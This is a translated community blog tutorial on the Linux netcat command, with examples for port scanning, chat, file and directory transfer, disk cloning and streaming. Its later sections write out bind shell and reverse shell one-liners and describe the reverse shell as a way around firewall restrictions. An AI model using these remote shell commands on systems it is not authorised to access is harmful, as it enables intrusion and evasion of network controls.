×
Community Blog Linux Netcat Command – Swiss Army Knife in Network Tools

Linux Netcat Command – Swiss Army Knife in Network Tools

This article thoroughly explains Netcat with various use cases and examples.

Netcat is the Swiss army knife of network tools. It can read and write data in the network using TCP and UDP. Users can use it in a variety of ways in scripts by combining and redirecting with other tools. What can be done with the Netcat command is surprising.

Netcat establishes a link between two computers and returns two data streams. What you can do after that depends on your imagination. You can set up a server, transfer files, chat with friends, transfer streaming media, or use it as a separate client for other protocols.

Here are some examples of using Netcat:

[A(172.31.100.7) B(172.31.100.23)]

The Linux Netcat command instance:

1. Port Scanning

Port scanning is often used by system administrators and hackers to find open ports on some machines to help them identify vulnerabilities in the system.

$nc -z -v -n 172.31.100.7 21-25

It can run in TCP or UDP mode. The default is TCP, and the -u parameter is adjusted to UDP.

The z parameter tells Netcat to use 0 IO, close the connection immediately after the connection is established, and do not exchange data.

The v parameter refers to the use of redundant options (verbose output).

The n parameter tells Netcat not to use DNS to reverse query the domain name of an IP address.

This command prints all open ports from 21 to 25. Banner is a text, and banner is a text message sent to you by the service you connect to. Banner information is very useful when you try to identify vulnerabilities or types and versions of services. However, not all services will send banner.

Once you find an open port, you can easily use the Netcat connection service to grab their banner.

$ nc -v 172.31.100.7 21

The Netcat command connects to open port 21 and prints the banner information running on this port.

2. Chat Server

If you want to talk to your friends, there is a lot of software and information services available. However, what if you don't have such a luxurious configuration? For example, if you are in a computer laboratory, and all external connections are restricted, how do you communicate all day with your friends sitting in the next room? Don't be depressed. Netcat offers a method. You need to create a Chat server, a predetermined port, so your friend can contact you.

Server:

$nc -l 1567

The Netcat command starts a TCP server on port 1567, and all standard outputs and inputs are output to this port. Both the output and input are displayed in this shell.

Client:

$nc 172.31.100.7 1567

Whatever you type on Machine B will appear on Machine A.

3. File Transfer

Most of the time, we are trying to transfer files using the network or other tools. There are many methods, such as FTP, SCP, and SMB, but when you only need to transfer files temporarily or once, it is not worth wasting time installing and configuring the software to your machine. Let's suppose you want to transfer a file (file.txt) from A to B. Both A and B can be used as the server or client. A will be the server, and B will be the client.

Server:

$nc -l 1567 < file.txt

Client:

$nc -n 172.31.100.7 1567 > file.txt

Here, we create a server on A and redirect Netcat's input to file.txt. When connected to the port, Netcat will send the file content of the file.

We redirect the output to file.txt on the client side. When B connects to A, A sends the file contents, and B saves the file contents to file.txt.

It is unnecessary to create a file source as a Server. We can also use it in the opposite way. Like the following, we send files from B to A, but the server is created on A. This time, we only need to redirect Netcat's output and redirect B's input file.

B as Server:

Server:

$nc -l 1567 > file.txt

Client:

nc 172.31.100.23 1567 < file.txt

4. Directory Transfer

Sending a file is simple, but if we want to send multiple files (or the entire directory), it is as simple. We only need to use the compression tool tar.

Follow the steps below to transfer a directory from A to B using the network.

Server:

$tar -cvf – dir_name | nc -l 1567

Client:

$nc -n 172.31.100.7 1567 | tar -xvf –

We create a tar archive package on the A server, redirect it using the console, and use the pipeline to redirect to it Netcat, which can send it using the network.

We download the compressed package through the Netcat pipeline and open the file on the client side.

If you want to save bandwidth to transmit compressed packets, you can use bzip2 or other tools to compress them.

Server:

$tar -cvf – dir_name| bzip2 -z | nc -l 1567

Compression Using bzip2:

Client:

$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf –

Decompression Using bzip2.

5. Encrypt the Data You Send Using the Network

If you are worried about the security of sending data on the network, you can encrypt your data with a tool (such as mcrypt) before sending it.

Server:

$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

Use the mcrypt tool to encrypt data

Client:

$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

Use the mcrypt tool to decrypt data

The preceding two commands will prompt you for a password. Ensure that both ends use the same password.

Here, we use mcrypt for encryption, but any other encryption tool can be used.

6. Streaming Video

This is not the best way to generate streaming video, but there is still hope to make this happen using Netcat if there is no specific tool on the server.

Server:

$cat video.avi | nc -l 1567

Here, we just read from a video file and redirect the output to the Netcat client.

$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 –

Here, we read data from the socket and redirect it to mplayer.

7. Clone a Device

You have already installed and configured a Linux machine and need to repeat the same operation on other machines, and you do not want to repeat the configuration. Instead of repeating the configuration and installation process, use some flash drives of another machine to clone your machine.

If your system is on a disk/dev/sda, it is simple to clone Linux PC.

Server:

$dd if=/dev/sda | nc -l 1567

Client:

$nc -n 172.31.100.7 1567 | dd of=/dev/sda

The dd is a tool that reads raw data from a disk. I redirect its output to other machines using the Netcat server and write it to disk. It will copy all the information along with the partition table. However, if we have already partitioned and only need to clone the root partition, we can change sda to sda1 and sda2 according to the location of our system root partition.

8. Open a Shell

We have used remote shells (using telnet and ssh), but if these two commands are not installed, and we do not have permission to install them, we can also use Netcat to create remote shells.

Let's say your Netcat supports the -c -e parameter (default Netcat).

Server:

$nc -l 1567 -e /bin/bash –i

Client:

$nc 172.31.100.7 1567

Here, we have created a Netcat server and indicated that the /bin/bash will be executed when it connects successfully.

If Netcat does not support the -c or -e parameter (openbsd netcat), we can still create a remote shell.

Server:

$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here, we create a fifo file and use the pipeline command to direct the contents of this fifo file to shell 2>&1. It is used to redirect standard error output and standard output and then pipe to port 1567 where Netcat runs. At this point, we have redirected the output of Netcat to the fifo file.

Instructions:

  • Input received from the network is written to the fifo file
  • The cat command reads the fifo file, and its contents are sent to the sh command.
  • The sh command receives input and writes it back to Netcat.
  • Netcat sends output to the client using the network.
  • It succeeded because the pipeline makes the command execute in parallel, the fifo file is used to replace the normal file, and fifo makes the read wait. If it is a normal file, the cat command will end as soon as possible, and start reading the empty file.
  • Simply connect to the server on the client

Client:

$nc -n 172.31.100.7 1567

You will get a shell prompt on the client.

9. Reverse Shell

A reverse shell is a shell that is opened on the client. Reverse shell is named this way because it is unlike other configurations. The server here uses services provided by the customer.

Server:

$nc -l 1567

Tell Netcat to execute the shell after the connection is completed on the client side.

Client:

$nc 172.31.100.7 1567 -e /bin/bash

What is special about reverse shell?

Reverse shell is often used to bypass firewall restrictions, such as blocking inbound connections. For example, I have a private IP address of 172.31.100.7, and I use an agent server to connect to the external network. If I want to access this machine (such as the 1.2.3.4 shell) from outside the network, I will use reverse shell for this purpose.

10. Specify the Source Port

Assuming that your firewall filters all ports except port 25, you need to use the -p option to specify the source port.

Server:

$nc -l 1567

Client:

$nc 172.31.100.7 1567 -p 25

Use a port within 1024 requires root permissions

This command will open port 25 on the client for communication. Otherwise, a random port will be used.

11. Specify the Source Address

Let's suppose your machine has multiple addresses, and you want to specify which address to use for external data communication. We can use the -s option to specify an IP address in Netcat.

Server:

$nc -u -l 1567 < file.txt

Client:

$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

This command binds the address 172.31.100.5.

This is just a few examples of using Netcat.

Other uses include:

  • Using the -t option to simulate the Telnet client
  • The HTTP client is used to download files.
  • Connect to the mail server and check the mail using the SMTP protocol
  • Use ffmpeg to capture the screen and share it through streaming

As long as you know the protocol, you can use Netcat as a network communication medium to implement various clients.

Disclaimer: This is a translated article from Linux China, all rights reserved to the original author. The views expressed herein are for reference only and don't necessarily represent the official views of Alibaba Cloud.

0 0 0
Share on

Alibaba Cloud Community

1,024 posts | 250 followers

You may also like

Comments

Alibaba Cloud Community

1,024 posts | 250 followers

Related Products